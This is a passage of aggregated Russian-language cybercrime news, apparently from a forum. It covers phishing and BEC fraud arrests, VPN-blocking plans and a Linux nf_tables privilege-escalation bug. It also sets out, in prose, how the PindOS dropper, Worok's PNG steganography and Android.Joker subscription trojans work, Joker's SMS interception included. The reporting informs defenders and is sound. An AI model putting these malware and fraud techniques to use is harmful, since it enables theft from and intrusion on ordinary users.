условиях, связанных с пандемией, в целом отмечается рост онлайн-шоппинга и
возникновение новых способов мошенничества.
Исследователи пишут, что в этом году некоторые злоумышленники стали повторно использовать темы и веб-страницы, оставшиеся от прошлых фишинговых кампаний. Например, было обнаружено электронное письмо, якобы пришедшее от бренда Pandora, которое было практически аналогично фишинговой рассылке, приуроченной к «черной пятнице» в ноябре 2020 года.
В этом сообщении пользователю предлагали купить ювелирные изделия по неоправданно низким ценам на фейковом сайт Pandora (www[.]Pcharms [.]Com). В тексте мошенников даже не был изменен год — «Официальный сайт Pandora 2020» вместо 2021, а адрес компании был написан строчными буквами — «northern lakes lane, laurel, md, 20723». То есть послание содержало явные признаки того, что письмо пришло из сомнительного источника, а сайт — поддельный. В имени отправителя использовалось название бренда, однако сам адрес электронной почты явно не имел к Pandora никакого отношения.
Фальшивый
сайт
Источник: xakep.ru/2021/02/17/valentines-day-phishing/
Роскомнадзор собирается потратить 59 млрд руб. на обновление технических средств противодействия угрозам (ТСПУ), которые установлены на сетях операторов связи и позволяют блокировать интернет-ресурсы в Рунете, а также способы обхода блокировок. Это следует из федерального проекта «Инфраструктура кибербезопасности» (входит в нацпроект «Экономика данных и цифровая трансформация государства»), с которым ознакомился Forbes.
Согласно документу, модернизировать ранее установленные ТСПУ и установить новые планируется с 2025-го по 2030 год. Это позволит «повысить уровень эффективности ограничения доступа к средствам обхода блокировок VPN до 96%», говорится в пояснении к проекту.
ТСПУ представляет собой программно-аппаратный комплекс, то есть компьютер с установленным на нем приложением, говорит технический эксперт проекта «Роскомсвобода». «В рамках модернизации РКН приобретет новые серверы и софт, серверы будут быстрее, и их поставят там, где их до этого не было, а софт будет эффективнее работать», — полагает он. В результате, по словам эксперта, ТСПУ будет эффективнее блокировать и «замедлять» неугодные ресурсы.
Роскомнадзор признает, что на данный момент он не может блокировать современные VPN-сервисы и ему требуется обновление технических возможностей, говорит сотрудничающий с проектом «Сетевые Свободы» киберадвокат Станислав Селезнев.
«Существуют обоснованные замерами технических специалистов предположения, что текущая версия ТСПУ позволяет обнаруживать и блокировать сигнатуры нескольких видов VPN-протоколов (OpenVPN, IKEv2, WireGuard). Однако, кроме этих, существуют еще десятки протоколов и сервисов, которые ТСПУ сейчас отследить не может», — пояснил Селезнев.
Модернизация может привести к тому, что VPN-сервисы потеряют эффективность для доступа к запрещенному контенту, считает эксперт юридической фирмы DRC Кира Таран. «Это будет война меча и щита, кошек и мышей. Технически можно достигнуть блокировки 90% трафика VPN-сервисов. При этом у тех, кто захочет получать доступ к заблокированным ресурсам, такая возможность технически останется, но станет сложнее и дороже», — отметил гендиректор «Комфортела» Дмитрий Петров.
Модернизация системы блокировки неугодного контента необходима, в первую очередь, чтобы импортозаместить оборудование ТСПУ и дать заработать поставщикам, а уже во вторую очередь, чтобы эффективнее блокировать VPN- трафик, отметил источник Forbes в одном из операторов связи.
forbes.ru/tekhnologii/520876-rkn-pletet-novye-seti-sluzba-obnovit-sistemu- blokirovki-sajtov-za-59-mlrd-rublej
Сотрудниками уголовного розыска и следственного отдела УМВД России по Чукотскому автономному округу при силовой поддержке бойцов СОБРа регионального управления Росгвардии в ходе служебной командировки в город Ульяновск задержан 27-летний местный житель. По версии следствия, обвиняемый причастен к незаконному обналичиванию денежных средств, добытых преступным путём.
Ранее мы сообщали о пресечении деятельности группы телефонных мошенников из числа осуждённых, отбывающих наказание в исправительном учреждении уголовно- исполнительной системы Ульяновской области, пособничество которым оказывали граждане, находившиеся на свободе. Подельники звонили жителям разных регионов страны и представлялись сотрудниками надзорного органа. Они сообщали, что в организациях, где трудятся потерпевшие, будет проведена проверка, и убеждали их перевести на подконтрольные банковские карты денежные средства в счёт оплаты цветов, подарков и иных товаров для членов комиссии.
Похищенные деньги обналичивались участниками группы, находящимися на свободе, а полученный преступный доход распределялся между пособниками. От действий аферистов пострадало не менее 30 граждан, которые лишились более миллиона рублей.
27-летнему жителю Ульяновска, исполнявшему в криминальной схеме роль «обнальщика», было предъявлено обвинение в совершении мошенничества. Фигурант находился под подпиской о невыезде и надлежащем поведении, однако скрылся от следствия, нарушив тем самым меру пресечения. После повторного задержания по ходатайству следователя суд заключил обвиняемого под стражу.
Расследование уголовных дел, возбуждённых по признакам преступлений, предусмотренных ч. 4 ст. 159 и ч. 3 ст. 30, ч. 4 ст. 159 Уголовного кодекса Российской Федерации, продолжается.
Гражданская гвардия арестовала 30 человек в разных регионах Испании, подозреваемых в обмане жертв из разных стран, включая Португалию, на сумму более миллиона евро, используя схему, широко известную как "человек посередине". Среди арестованных два лидера преступной организации.
В заявлении Гражданской гвардии объясняется, что задействована операция "Осгилиат", в ходе которой "также были установлены личности еще 40 предполагаемых преступников, большинство из которых проживают в Испании, но также в Хорватии, Венгрии, Англии, Марокко, Нигерии, Пакистане и Румынии, личности которых были доведены до сведения суда и властей этих стран".
Всего за один год, объясняет управление, "более 100 жертв были обнаружены в Испании, Германии, Андорре, Бельгии, Болгарии, Эквадоре, Словении, Финляндии, Нидерландах, Венгрии, Ирландии, Италии, Литве, Польше, Португалии, Соединенном Королевстве, Чешской Республике и Румынии, которые были обмануты преступной организацией".
Расследование началось в мае прошлого года после "жалобы строительной компании, которую обманули на сумму более 10 000 евро с использованием метода, известного как "человек посередине"". При этом типе кибератаки, также известном как "Мошенничество генерального директора" (компрометация деловой электронной почты), "преступники вторгаются в разговоры между двумя или более устройствами, обычно поставщиком и его клиентами".
Мошенник "получает доступ к разговорам между ними и перехватывает те, которые касаются платежей, в которых он выдает себя за поставщика и изменяет информацию таким образом, чтобы жертва совершала переводы на номер счета преступника".
С другой стороны, "выдавая себя за клиента, он договаривается с поставщиком о продлении сроков осуществления платежей, выигрывая таким образом время". Когда жертва совершает перевод, "мошенник перестает вмешиваться в разговоры, и именно тогда афера раскрывается". Guardia подтвердила, что подозреваемые "использовали другие методы кибермошенничества".
Выдавая себя за настоящие компании, они рекламировали автомобили, сельскохозяйственную технику и недвижимость для сдачи в аренду на время отпуска". Для этого "они создали поддельные веб-сайты, где предлагали один из этих продуктов, которого у них на самом деле не было, по конкурентоспособной цене и под названием платежеспособного бренда, даже используя реальный номер НДС компании, за которую они выдавали себя, но предоставляя в качестве контактного лица адрес электронной почты, созданный мошенниками".
Как только внимание тех, кто заинтересован в приобретении одного из продуктов, привлекается, "они начинают разговор по электронной почте, в котором, среди прочего, просят жертву предоставить копию своего документа, удостоверяющего личность, который они используют для заключения контрактов на финансовые продукты (банковские счета или займы), используя узурпированную личность".
Сумма, которую обманули в этих случаях, "является суммой, запрошенной за бронирование транспортного средства, станка или дома".
Еще один способ завладеть данными людей, чьи личности они узурпируют, "заключается в ложных предложениях работы, которые они широко рекламируют".
Когда жертва заглатывает наживку, "они запрашивают документацию и личные данные под предлогом регистрации контракта, но на самом деле их используют для осуществления преступной деятельности".
Для перевода денег, полученных от мошенников, "у организации была сеть посредников, которым она выплачивала комиссионные в размере от 50 до 1500 евро.
Когда деньги оказывались на счетах преступников, они снимали их в банкоматах, вкладывали в виртуальные валюты или переводили на счета в Республике Мальта и Литовской Республике".
Гражданская гвардия продолжает изучать следы этих переводов. Операция проводилась в два этапа, первый в декабре 2023 года, в ходе которого пять человек были арестованы в городах Хетафе (Мадрид), Талавера-де-ла-Рейна (Толедо), Мораталла (Мурсия) и Пегалахар (Хаэн), а на втором этапе, который завершился 12 марта, еще 25 человек были арестованы в городах Льорет-де-Мар (Жирона) и Барселона.
Всего было арестовано 30 человек, 19 мужчин и 11 женщин, в возрасте от 19 до 56 лет. Идентифицированные 40 человек - 29 мужчин и 11 женщин в возрасте от 20 до 45 лет.
Дело было передано в Следственный суд № 4 Аликанте.
Также были арестованы 153 банковских счета и взыскано 114 366 евро в результате мошенничества, совершенного группой.
В операции участвовали прокуратура Аликанте по компьютерным преступлениям, ЕВРОПОЛ и полицейские силы 22 стран.
noticiasaominuto.com/en/mundo/2556662/30-detidos-em-espanha-por-burla-de-mais- de-um-milhao-vitimas-em-portugal
В Netfilter, подсистеме ядра Linux, используемой для фильтрации и модификации сетевых пакетов, выявлена уязвимость (CVE-2024-1086), позволяющая локальному пользователю выполнить код на уровне ядра и поднять свои привилегии в системе. Проблема вызвана двойным освобождением памяти (double-free) в модуле nf_tables, обеспечивающем работу пакетного фильтра nftables. Выявивший уязвимость исследователь безопасности разработал и опубликовал рабочий прототип эксплоита, применимый к ядрам Linux начиная с выпуска 3.15 и заканчивая 6.8-rc1.
Работа эксплоита продемонстрирована в актуальных выпусках Debian и Ubuntu с ядрами Linux 5.14 - 6.6, а также в окружении с ядром KernelCTF (Capture the Flag), включающем дополнительные патчи для блокирования типовых методов работы эксплоитов и используемом компанией Google в программе выплаты вознаграждений за поиск уязвимостей. Степень успешности работы эксплоита оценивается в 99.4%. В сопроводительной статье детально разобран процесс создания сложного многоуровневого эксплоита и обход присутствующих в ядре механизмов защиты и противодействия работе эксплоитов.
Проблема связана с ошибкой в функции nft_verdict_init(), которая допускает использования положительных значений в качестве кода ошибки отбрасывания пакетов (DROP) в hook-ах, что может быть использовано для вызова в функции nf_hook_slow() повторной операции освобождения памяти для буфера, для которого уже была вызвана функция free(). Проблема возникает когда операция NF_DROP формируется с ошибкой и ядро вначале интерпретирует NF_DROP, но затем освобождает буфер и возвращает статус NF_ACCEPT. Данная ситуация приводит к тому, что несмотря на освобождение связанного с пакетом буфера, его обработка не прекращается, а передаётся в другой обработчик, который в свою очередь второй раз вызывает функцию освобождения памяти.
Уязвимость проявляется начиная с версии ядра Linux 3.15, но эксплоит работает с ядрами начиная с 5.14. Исправление уязвимости предложено в выпуске ядра Linux 6.8-rc1 и в конце февраля перенесено в стабильные ветки 5.15.149, 6.1.76 и 6.6.15.
Дополнительно можно отметить [серию уязвимостей](https://seclists.org/oss- sec/2024/q1/233) в модуле ksmbd, предлагающем встроенную в ядро Linux реализацию файлового сервера на базе протокола SMB: Уязвимость, CVE-2024-26592 позволяет удалённо без прохождения аутентификации добиться выполнения своего кода с правами ядра на системах с активированным модулем ksmbd. Проблема вызвана состоянием гонки в коде обработки TCP-соединения, которое возникает из-за отсутствия выставления должных блокировок при работе с объектом.
Уязвимость, CVE-2023-52440 также позволяет удалённо добиться выполнения своего кода с правами ядра, но вызвана переполнением буфера при обработке некорректных сессионных ключей из- за отсутствия должной проверки размера данных, полученных от пользователя, перед их копированием в буфер фиксированного размера.
Уязвимости (1, 2, 3) CVE-2024-26594, CVE-2023-52442 и CVE-2023-52441 в ksmbd дают возможность удалённо без прохождения аутентификации определить содержимое памяти ядра. Уязвимость CVE-2024-26594 вызвана некорректной проверкой данных при обработке поступивших токенов SMB2 Mech, что приводит к возвращению данных из области за границей буфера. Уязвимость CVE-2023-52442 вызвана отсутствием должной проверки входных данных при обработке связанных в цепочку (chained) запросов. Уязвимость CVE-2023-52441 вызвана отсутствием необходимой проверки входных данных при обработке запросов согласования соединения SMB2.
Уязвимости CVE-2024-26594 и CVE-2024-26592 устранены в ядре 6.8 и корректирующих обновлениях прошлых стабильных веток 6.1.75, 6.6.14, 6.7.2. Остальные уязвимости устранены в ядре 6.5 и обновлениях 5.15.145, 6.1.53, 6.4.16.
В заключение можно упомянуть активацию работы новой команды разработчиков ядра Linux, созданной для анализа наличия уязвимостей и оценки связи вносимых в ядре исправлений с проблемами безопасности. В феврале разработчиками ядра была создана собственная служба CNA (CVE Numbering Authority), которая [получила](https://openssf.org/blog/2024/02/14/linux-kernel-achieves-cve- numbering-authority-status/) полномочия самостоятельного присвоения CVE-идентификаторов уязвимостям. До этого присовение CVE и анализ связи исправлений с возможными уязвимостями ложился на плечи разработчиков дистрибутивов, а в ядре потенциальные уязвимости не оставались выделены и фигурировали наравне с обычными исправлениями. Результаты работы новой службы превзошли все ожидания
"Искусственный интеллект практически удвоил нашу рабочую нагрузку", — Нил Кларк
Новое поколение инструментов искусственного интеллекта обещало упростить
задачи,
повысить эффективность и продуктивность на рабочем месте.
Однако американский издатель и редактор Нил Кларк высказал другую точку
зрения.
Он сообщил, что в последнее время пришлось временно закрыть онлайн-форму
подачи
заявок для своего журнала научной фантастики и фэнтези Clarksworld из-за
потока
"неизменно плохих" материалов, созданных искусственным интеллектом.
Сотни фрагментов контента, порожденных ИИ, стали головной болью для команды
Нила
Кларка, которой теперь приходится разбирать их вручную.
"На самом деле, это одна из самых неприятных ситуаций, с которыми мы
сталкивались",
— отметил Кларк огромный объем материала, созданного искусственным
интеллектом,
который теперь требует внимательной ручной работы от него и его команды.
"Это примерно удвоило нашу рабочую нагрузку", — добавил он.
Специалисты компании [Deep Instinct](https://www.deepinstinct.com/blog/pindos- new-javascript-dropper-delivering-bumblebee-and-icedid) рассказали о новом JavaScript-дроппере, который получил название PindOS (такое «самоназвание» нашли в коде вредоноса). Малварь используется для доставки в зараженные системы дополнительных полезных нагрузок, а именно Bumblebee и IcedID.

Исследователи напоминают, что Bumblebee и IcedID служат загрузчиками, выступая в качестве вектора проникновения других вредоносных программ на скомпрометированные хосты (включая программы-вымогатели).
Так, в недавнем отчете [Proofpoint ](https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era- icedid)сообщалось, что разработчики IcedID решили отказаться от функций банковского трояна, которыми малварь обладала ранее, чтобы полностью сосредоточиться только на доставке вредоносных программ.
В свою очередь Bumblebee, пришел на замену загрузчику BazarLoader, который ранее связывали с активностью ныне несуществующих хакерских группировок TrickBot и Conti.
Исследователи Deep Instinct пишут, что обнаружили в исходном коде PindOS комментарии на русском языке, и полагают, что это указывает на вероятное развитие партнерства между различными преступными группировками.
«Пока неясно, будет ли PindOS постоянно использоваться операторами Bumblebee и IcedID, — сообщают аналитики. — Если эксперимент окажется успешным для операторов обоих этих вредоносных “компаньонов”, PindOS может стать постоянным инструментом в их арсенале и завоевать популярность среди других злоумышленников».
Click to expand...
В целом эксперты описывают PindOS как «удивительно простой» загрузчик, предназначенный для скачивания вредоносных исполняемых файлов с удаленного сервера. Малварь использует два URL-адреса, один из которых является резервным тот на случай, если первый URL-адрес не поможет получить DLL-пейлоад. В итоге DLL запускаются при помощи rundll32.exe.
 [](https://xakep.ru/wp- content/uploads/2023/06/427813/fig03-exec-call-from-icedid-dropper.png)
«Извлеченные полезные данные генерируются псевдослучайным образом, on- demand, что приводит к созданию нового хэша каждый раз при извлечении пейлоада», — отмечают специалисты.
Click to expand...
Грантовая программа на 1 миллион долларов призвана поддержать разработку защитных ИИ-технологий и способствовать дискуссии о взаимодействии ИИ и кибербезопасности.
OpenAI, создатель популярных приложений ChatGPT и Dall-e, запускает грантовую программу по кибербезопасности на сумму 1 миллион долларов. Цель программы - повысить и измерить эффективность кибербезопасности на основе искусственного интеллекта (ИИ) и способствовать развитию дискуссии на высоком уровне о взаимодействии ИИ и кибербезопасности.
OpenAI приглашает к сотрудничеству специалистов по безопасности со всего мира, чтобы изменить баланс сил в области кибербезопасности с помощью применения ИИ и координации усилий людей, работающих на благо общественной безопасности.
OpenAI предлагает ряд интересных идей для проектов: от разработки ловушек для злоумышленников до помощи разработчикам в создании безопасного программного обеспечения по умолчанию и оптимизации процессов управления обновлениями безопасности.
Программа имеет три основные цели: во-первых, она стремится «укрепить защитников», предоставляя им передовые возможности ИИ. Во-вторых, она направлена на «измерение возможностей», разрабатывая методы для количественной оценки кибербезопасных способностей ИИ-моделей. В-третьих, она хочет «поднять уровень дискурса», поощряя глубокие обсуждения на стыке ИИ и кибербезопасности.
Эта инициатива бросает вызов традиционному взгляду на кибербезопасность. OpenAI подчеркивает актуальность выражения: «Защитники должны быть правы 100% времени, атакующим достаточно быть правыми один раз». Но компания видит важность сотрудничества в достижении общей цели - обеспечения безопасности людей. Она доказывает, что вооруженные ИИ защитники могут изменить ситуацию.
Ранее гендиректор CrowdStrike назвал ИИ «гонкой вооружений» и уверил, что ИИ- угрозе можно противостоять.
source: openai.com/blog/openai-cybersecurity-grant-program
«35-летний молодой человек у себя дома создавал вредоносные компьютерные продукты, которые могли вызвать сбой работы техники. Вскоре ему этого показалось мало, и он стал искать способы продажи для чего зашел на платформу, используемую хакерами в мессенджер «Jabber», где познакомился с единомышленниками и предложил свои услуги», – сообщили КазТАГ источники в правоохранительных органах.
Получив заказ, горожанин, изготавливал вирусные файлы, замаскированные под безвредные программы. Оплату за работу он получал на электронный кошелек- криптовалюту, затем обналичивал.
«Эти программы используются для уничтожения информации, копирования сведений, передаваемых по сетям телекоммуникации, блокировке, заражению компьютеров», – пояснил агентству специалист в области IT-технологий.
Для разоблачения преступной деятельности спецслужбы с санкции прокуратуры начали спецоперацию. За хакером было установлено негласное наблюдение, велся перехват переписки. Против него было возбуждено уголовное дело, после того как было собраны улики, его арестовали.
Как стало известно КазТАГ, приговором Кокшетауского горсуда хакер был осужден к трем годам ограничения свободы, с конфискацией трех ноутбуков и системного блока. Помимо пробационного контроля, осужденный должен отработать на принудительных общественных работах.
• Source: [https://kaztag.kz/ru/news/khakera-o...-razrabotku-troyanskiy- programm-v-kokshetau-1](https://kaztag.kz/ru/news/khakera-osudili-na-tri-goda- tyurmy-za-razrabotku-troyanskiy-programm-v-kokshetau-1)
Сотрудниками Московского уголовного розыска во взаимодействии с ФСБ России пресечена деятельность группировки, которая специализировалась на дистанционном мошенничестве.
«По имеющейся информации, в течение полугода (с лета 2021 по февраль 2022 года) злоумышленники, находясь в офисных помещениях на территории города Бердянска Запорожской области, звонили гражданам Российской Федерации и представлялись сотрудниками кредитных организаций. В ходе телефонных разговоров с потерпевшими сообщали, что третьими лицами на них оформлены кредиты в банках. Введенных в заблуждение собеседников убеждали снять денежные средства с расчетных счетов и перевести на другие якобы «безопасные» счета, которые на самом деле были подконтрольны соучастникам. Причиненный гражданам Российской Федерации ущерб исчисляется миллионами рублей», - сообщила официальный представитель МВД России Ирина Волк.
Следователями ГСУ ГУ МВД России по г. Москве возбуждено уголовное дело о мошенничестве в отношении организованной группы.
В ходе обысков в офисных помещениях, которые использовались соучастниками для осуществления противоправной деятельности, обнаружены сим-карты, компьютерное оборудование, более 150 жестких дисков, а также иные предметы и документы, имеющие доказательственное значение.
«В результате оперативно-розыскных мероприятий один из подозреваемых задержан. Ему предъявлено обвинение в совершении преступления, предусмотренного частью четвертой статьи 159 УК РФ, и избрана мера пресечения в виде заключения под стражу. Четверо фигурантов объявлены в розыск.
Расследование находится на контроле руководства Следственного департамента МВД России», - отметила Ирина Волк.
https://www.bleepingcomputer[.]com/...hide-new-malware-in-pngs-using- steganography/

#news Новая малварь от группировки Worok замечена в сетевых прериях. И прячут её злоумышленники в PNG-файлах с помощью стеганографии. Небольшие куски вредоносного кода записываются в наименьшие значащие биты пикселей изображения. Позже их доставляют и собирают на машине жертвы с помощью dll- ок...
t.me
Game over? Can someone who knows malware please tell us, is this basically
getting infected just by opening a PNG file? If that's the case, the world is
fucked.
игра закончена? Может ли кто-нибудь, кто знает вредоносное ПО, сказать нам,
заражается ли он, просто открывая файл PNG? Если это так, то миру пиздец.
Почти тысячу долларов перевела "поклоннику" из социальной сети пенсионерка из Сенненского района. Об этом сообщили в УВД Витебского облисполкома.
Жертвой интернет-мошенников стала 64-летняя сельчанка. Она снимала видеоролики и публиковала их в одной из популярных соцсетей. Спустя некоторое время один из подписчиков стал проявлять интерес к владелице профиля. Сначала замужняя женщина игнорировала сообщения, но после стала общаться с незнакомцем. Собеседник представился американцем, который в составе миротворческих войск сейчас якобы находится в Сирии. Также мужчина поделился, что стал вдовцом и воспитывает 7-летнюю дочь. Высылать свое фото загадочный американец отказался, он предложил новой знакомой продолжить общение в коммуникационном сервисе.
Уже через несколько недель мужчина предложил переехать в Беларусь вместе со своей дочерью, для чего был необходим сертификат от его организации. Поскольку денег на документ у американца не хватало, он попросил их у собеседницы.
Получив реквизиты счета, на который нужно было перечислить определенную сумму, пенсионерка отправилась в местный банк. Специалисты финансового института поняли, что женщину пытаются обмануть мошенники, и предостерегли от потерь, отказав в кредите. Женщина вернулась домой, но затем решила взять заем в другом банке, уже в Витебске. В итоге она перевела неизвестным $850, оплатив комиссию.
Собеседник настаивал, что этих средств недостаточно, и просил еще $1,3 тыс. Убедить сельчанку, что она стала жертвой мошенников, сумела ее дочь. Растерянная пенсионерка обратилась за помощью в милицию. По факту ведется проверка.
Раскрыто несколько схем мошенничества, включая создание подставных фирм и микрозаймы.
Китайские киберпреступники украли $529 млн. у жителей Индии, используя приложения для кредитования, поддельные предложения подработок и фиктивные схемы торговли криптовалютой. Об этом заявил отдел киберпреступности в штате Уттар-Прадеш, Индия.
Согласно сообщениям индийских СМИ , мошенники массово отправляли SMS- сообщения, которые, по словам полиции, отправлялись из Китая, при этом некоторые операторы находились в Непале и работали под руководством китайских злоумышленников. Поддельные веб-сайты и крипто-приложения были созданы для привлечения инвесторов.
Глава полиции Уттар-Прадеша по борьбе с киберпреступностью Тривени заявил, что за мошенничеством стоят одни и те же хакеры из Китая. В этом также замешаны SMS-агрегаторы
Преступники скрылись с украденными средствами, сначала переведя деньги жертв на местные индийские банковские счета и цифровые кошельки, а затем переведя наличные деньги на индийскую платформу обмена криптовалюты Zebpay и международную платформу Binance. Украденные деньги в конечном итоге были сняты в Китае.
Также была раскрыта еще одна схема вымогательства, проведенная мошенниками из индийского города Гуруграм. По сообщениям , четверо граждан Индии якобы вымогали деньги в обмен на ложные обещания небольших займов.
Подозреваемые также создали колл-центры для дальнейших преступлений и были нацелены на людей с низкой финансовой грамотностью. Сейчас преступники находятся под стражей. По данным Министерства по корпоративным вопросам Индии , мошенники поддерживали связь со своими иностранными коллегами с помощью китайского мессенджера Husys.
Следователи утверждают, что подозреваемые являлись акционерами и директорами подставных компаний, созданных в Индии от имени их китайских коллег, которые фактически принимали решения и управляли делами.
Министерство объявило об аресте одного жителя Индии, играющего ключевую роль в схеме, по имени «мистер Дортсе», когда он пытался бежать из Индии. Дортсе входил в совет директоров Jillian India Ltd и стал инициатором схемы.
source:
timesofindia.indiatimes.com/city/lucknow/uttar-pradesh-cops-unearths-
rs-4200-crore-frauds-linked-to-chinese-operators/articleshow/94103428.cms
hindustantimes.com/cities/gurugram-news/chinese-loan-app-racket-ggm-police-
say-scam-linked-to-fake-firms-with-china-links-101662966319715.html
pib.gov.in/PressReleasePage.aspx?PRID=1858389
Злоумышленники заработали не менее 34 000 евро, прежде чем были раскрыты.
Тюрьма не всегда отбивает у преступников желание продолжать идти по кривой дорожке. Например, 23-летний мужчина и его 22-летний сообщник вели фишинговые кампании даже после вынесения приговора.
По данным голландских властей, всего через несколько месяцев после заключения в камере одного из заключенных было обнаружено мобильное устройство, которое использовалось для проведения фишинговых кампаний. А всего власти обнаружили 4 устройства, которые осужденные использовали для обмана жертв. Голландские следователи обнаружили на них более 1 000 чатов с жертвами, которым злоумышленники рассылали вредоносные ссылки.
Преступники размещали поддельные объявления на голландском сайте Marktplaats.nl, заманивая жертв низкими ценами и предлагал перевести 0,01 евро по фальшивой платежной ссылке, которая собирала данные для входа в банковскую систему. Используя украденные данные, злоумышленники опустошали счета жертв.
А в ходе другой фишинговой кампании заключенные выдавали себя за друзей жертв,
связывались с ними через WhatsApp и просили подкинуть немного денег.
Жертвами этого дуэта стали по меньшей мере 258 человек, подарившие
злоумышленникам около 34 000 евро.
Власти считают, что более молодой преступник предоставлял данные, необходимые для проведения фишинговых атак, поэтому планируют добавить еще 44 месяца тюрьмы для 23-летнего и 66 месяцев для 22-летнего, а также заставить их выплатить 151 000 евро компенсаций.
В результате совместной правоохранительной операции Европола, итальянской и
испанской полиции были арестованы 106 членов итальянской мафии за
преступления, связанные с киберпреступностью и отмыванием денег.
Подозреваемые были арестованы на прошлой неделе на острове Тенерифе, на
испанских Канарских островах, в ходе операции правоохранительных органов под
названием «Фонтана Альмабахия».
Члены группы были в первую очередь сосредоточены на деятельности, связанной с
киберпреступностью, и власти описали ее как обладающую «высокой степенью
технической сложности».
Группа проводила атаки с подменой SIM-карт, фишинг и вишинг, чтобы взломать
сети компании и украсть средства или обманом заставить сотрудников отправлять
платежи на неправильные счета по классической схеме, называемой «мошенничество
генерального директора» или «мошенничество с BEC».
Используя эту тактику, группа украла, а затем отмыла более 10 миллионов евро
(~ 11,7 миллиона долларов) украденных средств, используя сеть денежных мулов и
подставных компаний, заявил сегодня Европол.
Большинство пострадавших компаний базировались в Италии, но группа также
обманывала и обманывала компании из Ирландии, Испании, Германии, Литвы и
Великобритании.
Группа беглецов итальянской неаполитанской мафии
Испанская полиция заявила, что начала отслеживать группу в июне 2020 года,
когда обнаружила опасных лиц, связанных с итальянскими мафиозными
организациями, обосновавшимися на Канарских островах.
Члены этой группы были связаны с четырьмя итальянскими мафиозными
организациями, такими как Camorra Napolitana, Nuvoletta, Casamonica и Sacra
Corona Unita.
Испанская полиция заявила, что они молча отслеживали подозреваемых, когда они
действовали и расширялись за последний год, чтобы понять и изучить их
внутреннюю структуру.
Они сказали, что группа была организована в виде типичной структуры пирамиды,
похожей на банду, с лидерами наверху и денежными мулами внизу.
Руководителями были члены итальянской неаполитанской мафии, которые часто
выезжали на Канарские острова для наблюдения за операциями.
«Для мафии этот способ финансирования был настолько важен, что они отправили
беглых членов итальянского правосудия из Италии, чтобы контролировать их
финансовую деятельность на месте и контролировать получение и перевод денег»,
Источник: <https://therecord.media/106-italian-mafia-members-arrested-for-sim- swapping-bec-scams-phishing/>
Эксперты компании «Доктор Веб» обнаружили в официальном магазине приложений для устройств Huawei, AppGallery, многофункциональные трояны семейства Android.Joker, которые подписывают пользователей на платные мобильные сервисы.
В общей сложности специалисты нашли в AppGallery 10 модификаций этих троянов, которые загрузили свыше 538 000 владельцев Android-устройств.
Семейство Android.Joker известно специалистам с осени 2019 года, и практически ежедневно аналитики обнаруживают новые версии и модификации этих троянов. Обычно такая малварь способна выполнять различные задачи (в зависимости от целей злоумышленников). Так, приложения-приманки, которые устанавливают жертвы, обычно представляют собой базовые модули с минимальным набором функций. Они лишь осуществляют связь между другими троянскими компонентами. При этом основные вредоносные задачи выполняют модули, позже загружаемые из интернета.
Раньше зараженные Android.Joker приложения встречались, в основном, в официальном каталоге Android-приложений Google Play. Однако теперь злоумышленники, судя по всему, решили расширить масштабы своей деятельности и обратили внимание на альтернативные каталоги, поддерживаемые крупными игроками рынка мобильных устройств.
Как и в случае с другими версиями этой малвари, обнаруженные в AppGallery модификации распространялись под видом безобидных приложений, которые при запуске работали как и ожидали пользователи. Такой прием позволяет вирусописателям дольше оставаться незамеченными и заразить как можно больше устройств.
Выявленные трояны скрывались в виртуальных клавиатурах, приложении-фотокамере, лончере, мессенджере, сборнике стикеров, программах-раскрасках, а также в игре. Восемь приложений распространял разработчик под именем Shanxi kuailaipai network technology co., ltd, а два других – разработчик под именем 何斌.



После загрузки и запуска такого приложения пользователи не замечают ничего
странного, тогда как Android.Joker незаметно соединяется с управляющим
сервером, получает необходимые настройки и скачивает один из вспомогательных
компонентов, который затем запускает.
Загружаемый компонент отвечает за автоматическую подписку владельцев Android- устройств на дорогостоящие мобильные услуги. Кроме того, приложения-приманки запрашивают доступ к уведомлениям, что понадобится им для перехвата SMS, поступающих от премиум-сервисов (с кодами подтверждения активации подписок). Также приложения задают лимит на количество успешно подключенных премиум-услуг для каждого пользователя. По умолчанию он равен 5, может быть изменен как в большую, так и меньшую сторону. В перехваченных специалистами конфигурациях, например, это значение доходило до 10.
Скачиваемый модуль детектируется «Доктор Веб» как Android.Joker.242.origin. Также помечены и другие аналогичные модули, которые загружают все 10 новых модификаций малвари. Кроме того, такие же модули использовались и в некоторых версиях Android.Joker, распространявшихся, в том числе, через Google Play. Например, в таких приложениях как Shape Your Body Magical Pro, PIX Photo Motion Maker и других.
Android.Joker.242.origin подключается к удаленному серверу хакеров и запрашивает у него конфигурацию. В ней содержится список задач с сайтами премиум-сервисов, скрипты JavaScript, с помощью которых на этих сайтах имитируются действия пользователей, а также другие параметры.
Чтобы подписка произошла успешно, зараженное устройство должно быть подключено к мобильному интернету. Для этого Android.Joker.242.origin специально проверяет текущие подключения, и, если он обнаруживает активное Wi-Fi- соединение, пытается отключить его.
Для каждой задачи модуль создает «невидимый» WebView и последовательно загружает в каждом из них сайт платного сервиса. После этого троян загружает JavaScript и с его помощью самостоятельно нажимает на кнопки в веб-форме, автоматически подставляя номер телефона жертвы и пин-код для подтверждения, перехваченный другим базовым модулем, например ― Android.Joker.531.
Хуже того, малварь охотится не только за кодами активации, но и передает на сервер злоумышленников содержимое всех уведомлений о поступающих SMS, что может привести к утечке конфиденциальной информации.
«После получения оповещения от компании «Доктор Веб» Huawei скрыла приложения с вредоносными программами в магазине приложений AppGallery для обеспечения безопасности пользователей. Компания проведет дополнительную проверку с целью минимизации рисков появления подобных программ в будущем», — говорят в пресс-службе AppGallery.
Click to expand...
Источник: xakep.ru/2021/04/08/appgallery-malware/
УМВД России по г. Ижевску возбуждено уголовное дело по ч.1 ст.187 УК РФ в отношении 19-летнего учащегося техникума.
Следствием установлено, что в июле прошлого года к молодому человеку обратился знакомый с предложением легкого заработка. Он предложил оформить на имя студента банковские счета, а после передать доступ к ним за вознаграждение. Подозреваемый обратился в один из банков, где открыл 22 счета. Данные для доступа к ним и привязанные банковские карты он передал своему знакомому, получив за это 35 000 рублей. Позднее данные расчетные счета были использованы злоумышленниками для неправомерного осуществления финансовых операций.
В настоящее время в отношении подозреваемого избрана мера пресечения в виде подписки о невыезде. За данное преступление предусмотрено наказание в виде лишения свободы на срок до 6 лет.
ЦБ РФ, Росфинмониторинг и пять крупных банков реализуют пилот по установлению связей между фиатными и криптовалютными операциями пользователей.
Об этом пишет РБК со ссылкой на заявление директора по управлению портфелем проектов компании «Иннотех» Ильи Бушмелева.
Новый сервис «Знай своего криптоклиента» призван обучить кредитные организации выявлять осуществляемые клиентами криптовалютные транзакции.
